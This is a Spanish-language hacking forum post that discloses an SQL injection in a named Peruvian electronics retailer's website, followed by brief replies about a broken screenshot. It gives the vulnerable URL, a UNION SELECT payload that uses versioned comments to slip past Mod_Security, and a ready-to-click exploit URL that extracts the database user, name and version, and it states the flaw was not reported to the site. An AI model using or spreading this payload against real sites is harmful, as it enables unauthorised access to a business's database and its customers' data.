Underc0de

Sitio : https://impulso.com.pe

Descripción Del Sitio : Venta de artículos electrónicos en Perú.

Descripción de la inyección : Bueno esta inyección necesito un poco mas de creatividad que lo normal ya que se necesito pasar por sobre Mod_Security, el cual intentaba atraparme en mi intento de inyección, pero con tiempo y paciencia al fin lo logre bypassear al agregar !50000 antes de los comandos SQL que filtraba ;D.

• [SQLi] Inyección en URL (el resultado se la inyección se ve reflejado en la imagen, así que si miramos el código fuente veremos la inyección ).
      (http://fotos.subefotos.com/151f1a73a4ea78ffae24dff9b599474fo.png)
  
      Url del sitio : https://impulso.com.pe/detalle_marca.php?marca_id=
  
     Vector : -1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50
  
      xploit :  https://impulso.com.pe/detalle_marca.php?marca_id=-1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50  (https://impulso.com.pe/detalle_marca.php?marca_id=-1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50)
  
      Reportado: NO
  
      Autor: RREEDD

Muy bueno @rreedd (https://underc0de.org/foro/index.php?action=profile;u=51615) la imagen está caida, puedes resubirla?

Gracias,

Un saludo!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy bueno @rreedd (https://underc0de.org/foro/index.php?action=profile;u=51615) la imagen está caida, puedes resubirla?

Gracias,

Un saludo!

Hola compañero @blackdrake (https://underc0de.org/foro/index.php?action=profile;u=24972)  imagen resubida  :).